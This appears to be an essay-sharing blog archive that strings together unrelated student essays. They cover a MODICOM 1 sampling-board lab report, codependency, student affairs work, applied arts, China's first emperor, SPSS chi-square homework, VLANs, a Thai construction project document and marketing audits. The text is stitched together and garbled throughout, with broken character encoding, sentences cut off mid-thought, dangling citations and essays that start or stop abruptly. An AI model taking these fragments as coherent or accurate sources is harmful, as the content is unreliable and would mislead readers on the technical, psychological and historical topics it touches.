Monday, September 30, 2019

Digital Communications

OBSERVATION The modicom 1 board, first in my observation is the power input these are the electrical input connections necessary to power the module. The LJ Technical Systems' â€Å"I. C. Power 60† or â€Å"System Power 90† is the recommended power supplies. Then second is the sampling control logic is the circuitry generates the timing and control signals that sample the input waveform, and also creates a sinusoidal 1 kHz signal for use during the MODICOM 1 practical exercises.It is recommended that this signal is used for most of the experiments, as you will find that it is difficult to synchronize more than one oscilloscope trace when the input comes from an external source. Then third is the sampling circuit is the signal at the ANALOG INPUT socket is sampled at a rate, and for duration, which depends on the applied sampling control signal. Then fourth is the second order low pass filter this is a filter having a 3. 4 kHz bandwidth.Then lastly is the fourth order lo w pass filter is similar to the Second Order Low Pass Filter but has a steeper cut off gradient (represented by the graph on the board). CONCLUSION MODICOM 1 incorporates and on-board waveform generator that can be selected to provide a 1 kHz sine wave. An on-board pulse generator, giving a choice of 5 discrete sampling frequencies and 9 discrete duty cycles, is also provided. These on-board signal sources are phase locked, ensuring that the sampled waveforms appear stationary when observed on an oscilloscope. OBSERVATIONIn the experiment, we study the Modicom 1 Demonstration. The purpose of this is to understand the functions of each block using input analog signal. We connect the supplies to the board; we ensure sampling control board â€Å"internal† position. The duty cycle selector position is in 5. We link 1 kHz sine wave output to analog input. Then we turn on the power supply. Ensuring that all the connection are connected properly. We need to display the input sine wa ve and sample output and we link the sample output to the input of fourth order low pass filter.We display the output of the fourth order low pass filter. Successively press the frequency selector and observe the effect on the signal. CONCLUSION The sample and hold circuit stores  electric charge  in a  capacitor  and contains at least one fast  FET switch  and at least one  operational amplifier. To sample the input signal the switch connects the capacitor to the output of a  buffer amplifier. The buffer amplifier charges or discharges the capacitor so that the voltage across the capacitor is practically equal, or proportional to, input voltage.In hold mode the switch disconnects the capacitor from the buffer. The capacitor is invariably discharged by its own  leakage currents  and useful load currents, which makes the circuit inherently  volatile, but the loss of voltage (voltage drop) within a specified  hold time  remains within an acceptable error marg in. Therefore The sample and hold circuits are essentially used in linear systems. In some kinds of analog-to-digital converters, the input is often compared to a voltage generated internally from a  digital-to-analog converter  (D-A-C).The circuit tries a series of values and stops converting once the voltages are â€Å"the same† within some defined error margin. If the input value was permitted to change during this comparison process, the resulting conversion would be inaccurate and possibly completely unrelated to the true input value. Such successive approximation converters will often incorporate internal sample and hold circuitry. In addition, sample and hold circuits are often used when multiple samples need to be measured at the same time. Each value is sampled and held, using a common sample clock.

Sunday, September 29, 2019


Not a formal psychiatric diagnosis, codependency is a psychological syndrome noted in relatives or partners of alcoholics or substance abusers. † How It is created within a person Including the orally of the dysfunction. Also covered are what the symptoms of codependency are. I will also cover how to identify codependency in yourself or others. How the codependency affects a person's wellbeing & how to change that. The conclusion of the paper focuses on how to stop being codependent. This topic is near & dear to me. As I have predisposition towards codependency (more on that later). It seems to be a family tradition.Thinking about my relatives I could label all of them codependent. As well as most people especially In any type of caregiver role or job. Careers that have a propensity toward codependency are nursing or health care including therapists. All run the risk of wanting patients to get better so we can feel validated that we are skilled at our Job. Of course, we all wan t people to be relieved of their suffering but when that goal starts to interfere with our own sense of self, it becomes very detrimental. It goes from healthy caring to over caring & enmeshment, which can ruin our lives.When It started Innocently enough encouraged by society. It seems expected to be selfless, caring & loving to others sometimes to the determent of the self. If the individual is not, then they are deemed selfish & cold, which people would rather be, sick with someone (while helping them of course) then be labeled as self-involved or egocentric. Codependency is also being portrayed in movies. One particular story line about modern day vampires comes to mind. As I watched, I could not help but think wow way to encourage young impressionable minds to become enmeshed & codependent on one another to an extreme.Making statements such as â€Å"l would die for you† obviously not a statement to be taken lightly. Sadly, often they mean it. There seems to be a gender di fference here as well woman are much more likely to become codependents than men are. I liken that to the stereotypical role & societal expectation that woman will be the nurturers & caregivers for everyone in the family. This expectation could be expected at an early age expecting the little girl of the house to take on mommy's role if the mother is absent or sick possibly even too drunk or high to take on her duties.This loud also be the case for a boy whose Daddy is absent or sick. Mom may need the son to be a breadwinner at an early age or help tend the house. Worse, these single parents could expect these children to take on adult situations like bills emotional support or sexual incest. My experience as a codependent started as a child. I grew up in a dysfunctional home where my mother was an alcoholic. Her drinking was a secret from the outside world. My brother was the family scapegoat he had some behavioral issues. My role was the perfect child.There were many empty promise s about the drinking stopping but it never did. I never really understood the impact of growing up with an alcoholic until I learned about codependency. As a teenager, my first dating relationship was unhealthy. In the past, I have found myself in codependent relationships with men. Trying to help them & becoming immersed & obsessed. I have many of the symptoms of codependency that are listed below. I have since vowed that I will no longer enter into a codependent relationship with an unhealthy partner.With the awareness of them & by reading about the disease, I am dedicated to healing that within myself. With some insight into the disease, I see that y entire family is codependent. I tried for many years (l probably still do on some level) to help them to change their lives but I see how that is a futile pursuit. This â€Å"helping† continues to keep me codependent & sick with them. In the end, they are the only family I have & I need to accept them as they are. According to Facing Codependency Pip Melody describes â€Å"five symptoms: 1 . Experiencing appropriate levels of self-esteem (2. ) Setting functional Boundaries (3. ) Owning & experiencing their own reality (4. )Taking care of their adult needs & wants (5. ) Experiencing & expressing their reality moderately. † Codependency is called a disease it is a chronic & progressive illness. It is suggested that codependents want & need sick people around them to be happy in unhealthy ways. For example, a girl who grows up with an alcoholic father will unconsciously marry an alcoholic to perpetuate her addiction to creating, which is like a drug in it of itself.She gets fulfillment or validation while caring for the alcoholic like â€Å"he couldn't survive without me. † The reason it is called progressive is that the sicker people become around us the more intensely we exact. Codependency may not be an illness but it can make you sick & keep people But do not take action. They react to the problems, pains & behaviors of others with a disregard for their own feelings. They Justify theses creating roles as â€Å"helping† someone who has problems who cannot help themselves, I am the only one who can help, or I am the only person that cares.Is a common attitude among codependents. What they are actually doing is enabling the dysfunctional person to continue to be dysfunctional by helping them out of legal, financial, or accountability type situations. The codependent will bend over backwards, dedicating enormous amounts of energy & time & give their last dollars for the sick person. All hoping that the alcoholic or sick person will become better or change because of their help. Maybe the hope is that the alcoholic will become sober if he Just gets through this tough patch or gets the charges dropped.Meanwhile the codependent has done beyond their share of household, parenting & fiduciary duties. All the while, the codependent has lost some of themselves to the sic k people. They have lost their pride their sense of worth, their sense of respect, their time, their money etc. With the grand hopes that the sick person will see what I have sacrificed for them & they will acknowledge this & I will now get my needs met. This is unlikely to ever happen. How are the symptoms created? You guessed it childhood Just like a diseased tree its origin is in the root system.When children grow up in a family, that is less than nurturing or abusive & dysfunctional that creates codependent adults. The type of abuse or neglect that these children sustained can be vast. Abuse can be far & wide. Some forms are emotional, physical, psychological, verbal, or sexual, as well as neglect not providing or their needs or being too lax with them. Alternatively, being too rigid by expecting children to be more mature than they are capable for their age, which would include sharing adult subject matters with them being emotionally dependent, or financially and so on.Regardl ess of how we were treated as children, a core belief that what & how we were treated was normal & or loving. The dysfunction withstood is not recognized until later after the damage has been done. As children, we wanted to please our parents when this was not the case we internalized a sense of failure. We ere up with a distorted sense of what happened to us was normal & appropriate even it was not. We think the way our family & caregivers behaved toward us was correct & they are good people.The confusing part is if they are good & right then why do I feel unhappy or uncomfortable with certain occurrences that took place. How can they be wrong? No dysfunctional family is all-negative or without some good times. That is the main part of the dysfunction where the family or its individuals are not functioning normally. One of the hardest parts for children is the lack of consistency in the histrionically family. Whether it is with their needs being met consistently or how a parent dis ciplined or treated them when they were sober or high the baffling part was it always changed.A child may interpret this inconsistent behavior or treatment as â€Å"their fault† like â€Å"l did something wrong today & Mommy is mad & now she is drinking because I am a bad kid. Later when Daddy comes home there's goanna be a fight & it's all my fault if I could Just be more perfect then there wouldn't be fighting. † This is where the child internalizes shame & not being good enough or perfect heartsickness of codependents are: â€Å"Creating- they may feel responsible for other people's feelings, thoughts, choices, needs, wants, well-being or lack of & their destiny.Feeling compelled to help others with problems & offer unwanted advice, give multiple suggestions, or fix the feelings. They anticipate people's needs. Find themselves saying yes when they want to say no. Find themselves attracted to needy people & vice versa. They feel angry, used & unappreciated. Feel bor ed, empty or worthless when they don't have a crisis or someone to help in their lives. Overcoming themselves. Will give up routines to go out of their way for others. Feel safest when giving to others. Low Self Worth- Come from dysfunctional, repressed or troubled families, which they deny these issues.Blame themselves for everything. Reject praise or compliments. Never feel good enough. Feel they can't do anything right. Feel a lot of guilt. Feel ashamed of who they are. Think their lives are not worth living. Have a lot of â€Å"should†. Have been victims of abuse. Get depressed when not praised or complimented (stroke deprivation). Believe they do not deserve good things. Long for others to like & love them. Settle for being needed. Believe good things will never happen. Repression- Many push thoughts & feelings out of their awareness due to fear & guilt. Are afraid to let themselves be who they are.Can be controlling & rigid. Obsession- They feel anxious about problems & people. Worry about silly things. Think & talk a lot about others. Lose sleep over other peoples issues & behavior. Never find answers. Check on people. Abandon their routine because they are so upset with about somebody or something. Focus all their energy on other people & problems. Wonder why they never have any energy. Controlling- Many have lived with through events & with people who were out of control. Are afraid to let others be who they are & thus allow events to happen naturally.Get frustrated & angry. Feel controlled by people & events. Try to control events & people using various tactics. Denial- Ignore problems or pretend they are not happening. Pretend circumstances aren't as bad as they are in reality. Tell themselves tomorrow will be better. Stay busy so they don't have to think about things. Spend money compulsively. Overeat. Lie to themselves. Become workaholics. Believe lies. Go to Doctors for tranquilizer. Dependency- Look for happiness outside themselves. Don't feel happy, peaceful or content with themselves. Don't love themselves.Worry if others will like or love them. Look to relationships to provide all their good feelings. Often seek love from people incapable of loving. Desperately seek approval & love. Feel terribly threaten by the loss of a person or thing they think provides their happiness. Latch onto whoever or whatever they think can provide happiness. Center their lives around other people. Don't take time to figure out if others are healthy for them to be around. Lose interest n their own lives when they love. Worry other people will leave them. Tolerate abuse to keep people loving them.Don't believe they can take care of themselves. Leave bad relationships to form new ones that are Just as unhealthy. Wonder if they will ever find love. Feel trapped in relationships. Poor Communication- Blame, bribe, beg, coerce, threaten, don't mean what they say, don't say what they mean, don't know what they mean, don't take themselves ser iously, find it difficult to get to the point, gauge their words carefully for desired effect, talk too much, say everything is their alt, say nothing is their fault, lie to protect themselves, have a difficult time people.Weak Boundaries- Say they won't tolerate certain behaviors from others, gradually increase their tolerance until they can tolerate & do things they said they never would, let others hurt them, keep letting others hurt them, wonder why they hurt so badly, complain, blame, & try to control while they continue to stand there, finally get angry & become totally intolerant. Lack of Trust- Don't trust themselves, or others, don't trust their feelings don't trust their decisions, try to trust untrustworthy people.Anger- Feel very scared hurt & angry, live with people who feel the same, are frightened of their angry are frightened of others anger, feel controlled by other peoples anger, feel safer with their anger than with hurt feelings. Sexual Problems- Are caretakers i n the bedroom, have sex when they do not want to, have sex when they rather be held, nurtured & loved, withdraw emotional from their partner, are afraid of losing control, have strong sexual fantasize about other people.Miscellaneous- Codependents tend to be extremely responsible or extremely irresponsible, find it difficult to feel close to people, have a hard time having fun & eyeing spontaneous, become martyrs, sacrificing their happiness & that of others for causes that don't require sacrifice, vacillate in decisions & emotions, stay loyal to their compulsions & people even when it hurts, be ashamed about family, personal, or relationship problems, cover up, lie & protect the problem. Changing Codependency As we can see from the above list, codependency can be easy to identify with.The goal to changing the codependent behavior is not to detach from the person whom we are codependent with but to detach from the agony of involvement. Attachment occurs when we become overly worried about & preoccupied with a problem or a person. This uses up a lot of our mental energy. Obsessing, worrying & controlling are illusions. They are distracting us from ourselves & the real issues. The goal is to change that obsessing & extra energy that we are expending on someone or something other than ourselves. We need to let go with love. This can be done by detaching.Detaching does not mean we don't care about the problem or person that we have been obsessed with. Detaching means, we release the person with love & an attitude that if the problem isn't ours to solve than we can't change it. No matter how much we want someone to change or someone's problem to change WE ultimately are not able to. If the problem is someone else's then we need to realize that it is theirs to deal with not ours! When we detach we accept reality & the facts. It means to live in the present moment. We become neutral. The benefits from detaching & becoming neutral are many.We have a sense of serenity & peace the problem is no longer taking over our lives. If people have created disasters for themselves then we allow them to face those consequences. Without feeling like we are the only one who can rescue them. When we allow someone or something outside of ourselves to control our feelings then we are always at the mercy of something other than ourselves. This creates a victim mentality by giving away our sense of peace to outside sources it manifesting itself into inner turmoil. We are powerless or out of control of our wellbeing.Another key to overcoming codependency is to become less reactionary. We become oversensitive to every emotion, feeling, thought, behavior & problem that comes our way or someone else's. We allow ourselves to get so upset & distracted by little things or big things. That in turn creates a loss of control over our almost manic state. Letting go is a powerful & necessary step to recovery. We let go & let god as the twelve steps of recovery quote. Instead o f trying so hard to make things happen, we Just let go of the outcome instead of trying to control, the outcome.When we try to control results, we never get what we want. We may expend a lot of energy. Expecting if we try harder, we will get exactly what it is we want. Instead, we get frustrated, hurt, disappointed, sick & victimized. We cannot change people. When we think that we can we are deluded. When we try to control another they will either resist our efforts or try twice as hard to prove that we cannot control them. When we detach that person will notice something is different here. â€Å"Why wasn't I nagged or in trouble for this incident that I used to get in trouble for? Eventually they may realize â€Å"Oh no† this person is no longer going to rescue me & now I have to be accountable for myself more. When you remove yourself from the creating role, the other person will notice. They will eventually get the message. Start to focus on your own life. Find what inter ests you & pursue it. It is important to have a healthy interest in yourself & what makes you happy. Fall in love with yourself. Be your own best friend. Stop doing things for others that you do not want to do. Say that one very powerful word â€Å"no† when you want to.If you do say no then do not lay a guilt trip on yourself afterward about saying no. When you start putting your needs above others, you will become more peaceful & feel better about yourself. It is the opposite feeling of bending over backwards for someone & them not noticing. When you go out of your way for yourself, you will feel more valuable. It seems that overcoming codependency is a lifelong Journey with no quick fix available. There will always be people who enter our lives who will test our boundaries & challenge us to stand up for our wellbeing & ourselves.But, if you value yourself & understand, you have this propensity toward being codependent then that awareness will be helpful in creating healthy boundaries with others. As they say, awareness is the first step towards change. It is suggested to work the steps of a twelve-step program to facilitate the healing process as well as to help you bring peace to your new life, success, & leaning. It also helps to relate to others who have had similar experiences with codependency or another 12-step program. Beaten, M. (1992).

Saturday, September 28, 2019

An Overview Of Student Affairs Professionals Education Essay

An Overview Of Student Affairs Professionals Education Essay Do you feel that the task is somewhat overwhelming or is it possible for student affairs professionals to take up this mantle of responsibility on a daily basis? What welcomes undergraduates to this agenda and what, perhaps, hinders their acceptance of this function of American higher education? Student affairs’ professionals do have the capacity to carry out their duties on a daily basis. However, it is imperative that these professionals are organized in their approach and appropriately trained. According to Colby, Ehrlich, Beaumont and Stephens (2003) student affairs professionals must make a â€Å"concerted effort to assist students from the very first time that they come in contact with the school† (pp.226-227). Professionals must make students aware of the extracurricular activities available to them and the ways in which they can get involved on campus and in the surrounding community. The first relationship that student affairs’ professional have with s tudents begins with campus tours. These tours often leave an important first impression with students. Beyond the first impression student affair professional must make a concerted effort to reach out to the students once they become a part of the University community. Reaching out to the students require several different elements including e-mails, telephone call and a personal letter. As it pertains to e-mails students should be sent e-mail correspondence a few days before the event actually occurs. Such correspondence allows them time to adjust their schedules, so they can attend a function. Likewise, a personal message is an important form of communication that can greatly assist students/confidence helping in becoming more involved in campus life. Other announcements should be placed on bulletin boards in dorms or other high-traffic areas. Although communicating with students in this manner does require a great deal of work, it is not an impossible endeavor. Undergraduates are welcomed to the agenda when they are encouraged by student affair professionals to get involved in campus activities and in community activities. According to Colby et al (2003) â€Å"community service projects are of particular importance in most campus organizations† (p.134). Some students may not be as familiar with the importance of community service and the vital role that volunteers play in the context of a community. Making students aware of this particular agenda is vitally important as it informs the way they react to opportunities associated with community service. To this end professional must be sure to inform students of the benefits associated with community service and other types of community involvement. Students, freshmen in particular have many issues that they face, for instance, adjusting to college life. In some ways, all of these new adjustments can prevent students from making the progress they need to make in becoming involved. In some instances, stu dents do not get involved in such things because they are not aware that certain activities are occurring. Student’s affairs professional cannot assume students will automatically get involved in other activities. In addition, depending on the size of the institution a student may be intimidated by all the activities and may not know where to start as it relates to involvement in activities. In the case of the student feeling intimidated, student affair professionals must make a concerted effort to engage students and assist them in understanding the importance of community and campus involvement.

Friday, September 27, 2019

The First Emperor Assignment Example | Topics and Well Written Essays - 500 words

The First Emperor - Assignment Example One thing about Zichu was that he was sent as a hostage son of the Zhao Qin because he was not loved. However, Qin Empire kept on attacking Zhao Empire and this made Zichu mistreated in his host country. It was during his stay in Zhao state that Zichu met Lu Buwei and due to pity the latter felt for the former, they came up with a plan of establishing a successor in lady Huayang who was the king’s most fond concubine. However, Lady Huayang was Buwei’s concubine and Buwei impregnated her before presenting her to Zichu. Therefore, emperor Zheng was neither the son of the king nor the son of Zechu the Prince but the son to the famous merchant Lu Buwei. According to the stories, Qin’s Court was a very democratic court. This court executed wrong doers like the assassinators. The court ruled a death sentence on the assassinators who tried to assassinate the king. In the court, the men in the court were not allowed to carry weapons. However, the court did not have better measures to ensure that the king was safe while in the court. From the story of assassination, Crown Prince Dan from Yan State organized an assassination to get rid of Qin Shihaung. Jing Ke was to go for the mission accompanied by Qin Wuyang in the year 227 BC. Qin Wuyand was a fearful man so he didn’t execute his duty of presenting a gift to Qin Zheng. Jing Ke tried executing his goal of getting rid of Qin Zheng but didn’t make it and instead the two of them failed in the assassination and were to be killed later on and the Yan state fell a victim of the Qin State and conquered. Gao Jianli who was an ally of Jing Ke had the urge to avenge his friend’s death. Being the famous lute player and taking advantage of summon by King Zheng to play the lute, he felt he had a good opportunity. Gao Jianli failed in his assassination attempt and later faced execution. Sima

Thursday, September 26, 2019

Spss8 Essay Example | Topics and Well Written Essays - 1750 words

Spss8 - Essay Example 2. Is the type of beverage ordered with lunch at a restaurant independent of the age of the customer? A random sample of 309 lunch customers is taken, resulting in the following results. Determine whether the two variables are independent at 95% level of significance. (4 points) The p value is .000, which is lower than 0.05 suggests a relationship between age and type of beverage. The null hypothesis is thus rejected and the conclusion is that type beverage and age are related. 3. In one survey, successful women meeting managers were asked to state their personal definition of success in terms of several categories from which they could select. Thirty-nine percent responded that happiness was their definition, 12% said that sales/profit was their definition, 18% responded that helping others was their definition, and 31% responded that achievement/challenge was their definition of success. Suppose that you want to determine whether men meeting managers felt the same way and took a random sample of men meeting managers, resulting in the data shown. Use the Chi-square test to determine whether the observed frequency distribution of data for men meeting managers is the same as the distribution for women meeting managers. Let ÃŽ ± = .05. (4 points) The test statistics table shows a very small computed Chi-square value 201.56 and a very small p-value 0.00, which is smaller than 0.05. Therefore, H0 is rejected, and hence there is a difference between the successful women and those who were randomly sampled. 4. Is there a relationship between having a lap-top computer and a person’s profession? A survey of 187 managers of three professions: travel manager, lawyers and accountants, was conducted to investigate this question. Results are presented in the following table. Test whether having a lap-top computer is independent of profession at 95% level of significance. (4 points) The p value is

Virtual Local Area Networks Essay Example | Topics and Well Written Essays - 2000 words

Virtual Local Area Networks - Essay Example Ns, properties of LANs and broadcast domains, the advantages of using VLANs compared with older router based networks and finally discuss the situations in which VLANs are not appropriate or indispensable. Virtual Local Area Network (VLAN) is a logical group of workstations, servers and network devices that share the same broadcast domain without need to be geographically located in the same area (Chowdhury and Boutaba, 2009). This means that the network administrator can logically divide the LAN into different VLANs each with its own broadcast domain instead of having one broadcast domain shared between all devices in the network. For instance, an organization with different physically separated departments can segment its network into multiple VLANs based on the departments for special purposes. Hence, only hosts that belong to the same particular VLAN can exchange data or share network resources. In addition, different VLANs can communicate only through a router which has to be connected to both of them, hence reduced congestion of traffic in the network that originates from a broadcast frame (Hartpence, 2011). Therefore, splitting a network into VLANs boost the performance, securi ty and reduce the clogging on a large LANs (Yadav et al., 2013). The enhancement of today’s Virtual LAN has been achieved through different stages. According to (Cullen, 2001) the development of LAN switches began in 1990; bridges were used as a layer 2 devices to segment networks and to solve the consumption of bandwidth used in broadcast traffic. After that, it was replace by segmenting networks at layer 3 using a number of routers between segments and a chain of hubs inside each segment to forward frames between devices (Hartpence, 2011). The problem of using hubs is that, it deals with all frames as a broadcast frame and forward incoming frames to all devices in the shared segment. Therefore, the increased number of hosts in each segment leads to increased demand of bandwidth

Wednesday, September 25, 2019

Project Initiation Document (PID), Project Management, Heritage 59 Essay

Project Initiation Document (PID), Project Management, Heritage 59 Residence in Thailand - Essay Example Financial viability is always an important variable for commercial projects of this nature (Knight 2006) and already, financial feasibility has showed a net profit of THB 380 million over 36 months. The scope of the project clearly defines the boundaries of the project as in what will be involved in the project and what will not be involved in it. The Heritage 59 Residence project will comprise of a two building edifice that is located Sukhumvit Road. The first building will be a maintained 12-storey building at the front side of the site. The second building will be a reconstruction of the existing 3 story-building into a 27-storey at the back side of the site. The proposed financial scope given to the project is THB 85,000 per Sqm with the total land size of project being 806 sq.m to be completed in 36 calendar months. The scope described is graphically represented below Achievable It is important not to set an objective that will be excessively difficult to achieve. The project objective has therefore been defined to be moderate and made up fulfilling all legal provisions that were given in the course of seeking permit for the site plan. Relevant At the end of the project, there should be specific benefits that can be pointed to as the outcome of the project and this is to make a commercial gain of THB 380 million out of the project. Of the tasks, the procedure of construction team and materials will be the most highlighted. Generally, a bid will be opened for interested suppliers to tender. An executive from the Tender Board will be consulted to oversee this process. The project manager will then put in the procedures for procurement to begin by following the steps laid down by the National Procurement Board. The procurement, which is to centre stage will be undertaken through

Tuesday, September 24, 2019

Capstone simulation Essay Example | Topics and Well Written Essays - 500 words

Capstone simulation - Essay Example To start with, a company has to understand its present position in the industry. Position means that a company should assess its strengths and weaknesses as well as the possible opportunities and threats (Betts & Ofori, 2000, p.512). After having such an understanding, the company will be in a better position of minimizing its weaknesses, and at the same time exploiting every opportunity that comes its way. Another factor to address is the competitive nature of the market. Betts and Ofori (2000, p.515) asserts that competition trends in the market have to be studied closely in order to determine a specific company’s capability of selling its products. Companies that produce similar products need to be analyzed and their marketing abilities discussed. Through this consideration a company will be able to determine the possible threats posed by new entrants into the business, as well as threats of potential substitutes. In addition to that, a company will be in a position to determine the bargaining power of both the suppliers and buyers. This factor analyses all the market forces that are linked to competition intensity within a certain industry (Betts & Ofori, 2000, p.515). The extent of rivalry that exists between the competing companies needs to be determined, since any competitive move made by a single company may greatly affect other companies. Betts and Ofori (2000, p.525) argues that market attractiveness is also another factor that needs to be addressed when developing a strategic plan in a global context. This is where the business strength is analyzed, by assessing the possible factors that determine the market attractiveness. This can be done through carrying out an assessment of market growth-rate and the company’s profitability. Market attractiveness is a critical factor in business, since if a company has low market attractiveness it is likely to suffer from low sales. As a result a business has to keep high

Monday, September 23, 2019

The Internet and the Law Essay Example | Topics and Well Written Essays - 3500 words

The Internet and the Law - Essay Example If we look at the traditional model, those are more focused on the producer and distributor of the content. However, in the regulation the law has been amended in such a way that it holds the end user also accountable for any illegal content. The main aim of this article is to bring out the clear picture and the reason for which the regulation of the pornography has been made. This article is written in order to analyze the basis of the regulation of pornography. Though with the regulation the end users are also liable to possess illegal content or pornography, the legal regulation of the extreme pornography still lies with the producer and distributor of the content. In today's world of information technology and internet pornography has reached every nook and corner of the world. Every person is in the easy access of the pornography - whether it is online or offline. If we look at pornography from a different perspective, one question that comes to our mind is if it harmful or not. In some countries pornography is illegal. However, in some countries, possession of the same is not illegal but the distribution or publication is.2 In some countries possession is also illegal for certain types of pornography - like child pornography. In today's world there are various channels through which the pornographic contents are being circulated. The traditional delivery channels are print materials, DVDs, videos, CDs, TV. In the modern times internet, mobile phones, PDAs are also being included as the channel for the transmission. Censorship in the United Kingdom If we look at the censorship in the United Kingdom, there are many stringent laws that are applicable to varied arena. Since our core topic is related to the laws and regulations in the cyber or internet laws, let us straight away head towards the topic. The cyber law in the United Kingdom is very stringent. In the United Kingdom, the internet traffic is being passed through a service called Cleanfeed. The sole purpose of this procedure is to filter out the content that contains the indecent photographs of children of varied ages.3 Since there is a filter or check point being introduced, if there are any such pages that come up in the internet, the page is not delivered to the end user. Instead of that it shows an error stating "URL not found". There are many internet service providers who use WebMinder as well.4 There are few questions that we need to have clarify. Under the English Law, what is called as obscenity? This one question is very important to know. Along with that, to what extent can the obscene be distinguished from the pornographic? Look at the Coroners and Justice Act 2009, s62. How does this UK statutory provision compare with the relevant provision elsewhere internationally? Does extreme pornography regulation merit a different treatment in comparison to child pornography? What alternatives might there be for the regulation of undesirable online content? Could such altern atives provide a better solution to legal intervention? A Multi-Layered Approach Before we talk about the multi-layer approach of governance of pornography and child pornography, we need to know the processes by which pornography and child pornography can be regulated. The regulation of pornography is a controversial topic and the same is arisen in the recent years in relation with the Internet. In the recent days, the

Saturday, September 21, 2019

Appiled Arts Essay Example for Free

Appiled Arts Essay Although we now tend to refer to the various crafts according to the materials used to construct them-clay, glass, wood, fiber, and metal-it was once common to think of crafts in terms of function, which led to their being known as the applied arts. Approaching crafts from the point of view of function, we can divide them into simple categories: containers, shelters and supports. There is no way around the fact that containers, shelters, and supports must be functional. The applied arts are thus bound by the laws of physics, which pertain to both the materials used in their making and the substances and things to be contained, supported, and sheltered. These laws are universal in their application, regardless of cultural beliefs, geography, or climate. If a pot has no bottom or has large openings in its sides, it could hardly be considered a container in any traditional sense. Since the laws of physics, not some arbitrary decision, have determined the general form of applied-art objects, they follow basic patterns, so much so that functional forms can vary only within certain limits. Buildings without roofs, for example, are unusual because they depart from the norm. However, not all functional objects are exactly alike; that is why we recognize a Shang Dynasty vase as being different from an Inca vase. What varies is not the basic form but the incidental details that do not obstruct the objects primary function. ?Sensitivity to physical laws is thus an important consideration for the maker of applied-art objects. It is often taken for granted that this is also true for the maker of fine-art objects. This assumption misses a significant difference between the two disciplines. Fine-art objects are not constrained by the laws of physics in the same way that applied-art objects are. Because their primary purpose is not functional, they are only limited in terms of the materials used to make them. Sculptures must, for example, be stable, which requires an understanding of the properties of mass, weight distribution, and stress. Paintings must have rigid stretchers so that the canvas will be taut, and the paint must not deteriorate, crack, or discolor. These are problems that must be overcome by the artist because they tend to intrude upon his or her conception of the work. For example, in the early Italian Renaissance, bronze statues of horses with a raised foreleg usually had a cannonball under that hoof. This was done because the cannonball was needed to support the weight of the leg. In other words, the demands of the laws of physics, not the sculptors aesthetic intentions, placed the ball there. That this device was a necessary structural compromise is clear from the fact that the cannonball quickly disappeared when sculptors learned how to strengthen the internal structure of a statue with iron braces (iron being much stronger than bronze). Even though the fine arts in the twentieth century often treat materials in new ways, the basic difference in attitude of artists in relation to their materials in the fine arts and the applied arts remains relatively constant. It would therefore not be too great an exaggeration to say that practitioners of the fine arts work to overcome the limitations of their materials, whereas those engaged in the applied arts work in concert with their materials.

Friday, September 20, 2019

Marketing Planning Is A Logical Sequence Of Events Marketing Essay

Marketing Planning Is A Logical Sequence Of Events Marketing Essay Marketing planning is a logical sequence of events leading to the setting of marketing objectives and a formulation of plans for achieving them. The complexity of marketing planning means that when organizations embark on it, they should expect to encounter a number of organizational, attitudinal, process and cognitive problems. First we have generally explained the process of and techniques used for auditing the marketing environment. Then we have carried out the Swot and Pest analysis of our selected organization CHIEF. Chief is a Pakistani owned fast food company that is committed to providing innovative products that are consumer and lifestyle focused. Chief Burger offers a wide and varied menu to customers specializing in quality burger chicken products. We have also generally discussed different internal and external barriers to marketing planning and make suggestion that how CHIEF may overcome these barriers to marketing planning. We have briefly discussed that according to w hich techniques CHIEF should audit the marketing environment. We have also discussed other possible marketing barriers which CHIEF may undertake and give suggestions to deal with these barriers. Finally we have evaluated the current auditing marketing technique which CHIEF is practicing against the defined process and on these analysis, recommended some suggestions to CHIEF that may better overcome the threats and avail opportunities in the environment. P1: Explain the processes and techniques used for auditing the marketing environments. Environmental Audit   Background Companies conduct environmental audits to obtain accurate comprehensive and meaningful information for the company through which companys management can make important decisions and make new strategies. A companys management decisions are heavily based on environmental audit.    Planning an Environmental Audit   Companies must have a clear idea of their objectives before conducting an environmental audit. Before conducting the audit they should also take full commitments from directorate level and should then communicate it to personnel at all levels.  Ã‚   PROCESS OF MARKETING AUDIT Basically there are following four steps involved in the process of marketing audit. A: Selecting the Auditor: in this stage of marketing audit the decision is taken about the auditor that who will conduct the overall process of auditing. Usually an experienced outside party is hired for this purpose.   B: Deciding the Areas of Audit: the second step is deciding the areas of audit. In these step objectives goals and mainly scope and breadth of the audit are decided. C: Identifying and Collecting Data: in this step the auditors usually identifies and categorizes the sources of data thus using these sources further data is collected. D: Report Preparing and Presentation: the last step involves the preparing of data. After it is completed and thoroughly checked it is further provided and presented to the client. The process of marketing audit is very broad and extensive in nature in a way that it includes almost all marketing related aspects. It basically includes marketing environment marketing strategy marketing organization marketing systems marketing mix, marketing productivity and profitability. Kotlers and Armstrong, 2008 Marketing environment is very wide in nature. Basically it includes microenvironment and macro environment. So for the auditing purpose different tools are used which may include SWOT analysis STEEPLED analysis and Five Forces Analyses etc. There are also several other purposes and benefits of marketing audit. A number of these are stated as under: Determination of Work Process: one of the main purposes of marketing audit is that it is very beneficial in determining the working process. It determines and evaluates that what the company or firm is currently doing and assesses its history of work that what it has done in its past? Future Recommendations: marketing audits center of attention is its future recommendations for the firm. It bases its research for this purpose and accordingly provides useful recommendation for the future mechanisms. Thus it is not only useful for historical or current processes but it is also used for following sessions of business. Opportunity Hunting and exploiting them: likewise marketing audit it also pretty useful in hunting the opportunities that the firm can exploit. Thus different opportunities can be availed with proper handling. Similarly it can also identify the source to be used for availing those opportunities.   Weakness Eradicator: Nipping the evil in the buds would not be wrong if referred with marketing audit. Marketing audit not only helps in eliminating the current weaknesses but is also helpful in recognizing the weaknesses that the firm can face in future. Thus with the help of marketing audit proper plans can be set up for eradicating both the current and future weaknesses. Enhancement in Marketing Planning: marketing audit also plays a pivotal role in enhancing the marketing plan. It brings improvement in the marketing plan of a firm as required which results in making the firm more successful and thus it can work more efficiently and effectively. Similarly marketing audit is also very significant because: Marketing audit is really helpful in improving marketing efficiency and effectiveness. Moreover it brings proper awareness throughout the firm about its environment. It supports building of internal relationship in the firm. Similarly it is helpful in identifying ill-used marketing resources and thus preparing a proper plan for their favorable use. It is used for prognosis and diagnosis purpose, similarly for preventive and curative purposes. It also identifies several areas of accomplishment and the foreseeable challenges that are found in an organization which are a cause of affecting return on investment (ROI).  Ã‚   In short marketing audit provides a snapshot of the whole marketing process of an organization Internal Environmental Audit Following are some of the internal environmental factors which affect the organizations. Customers The customers of the organization are the micro environmental factor that affects the business environment. The customer is the king in this era and the organization has to create strategies  Ã‚   keeping in mind the customers. The cash and loss that are made by the organization are on the basis of customers.  Ã‚   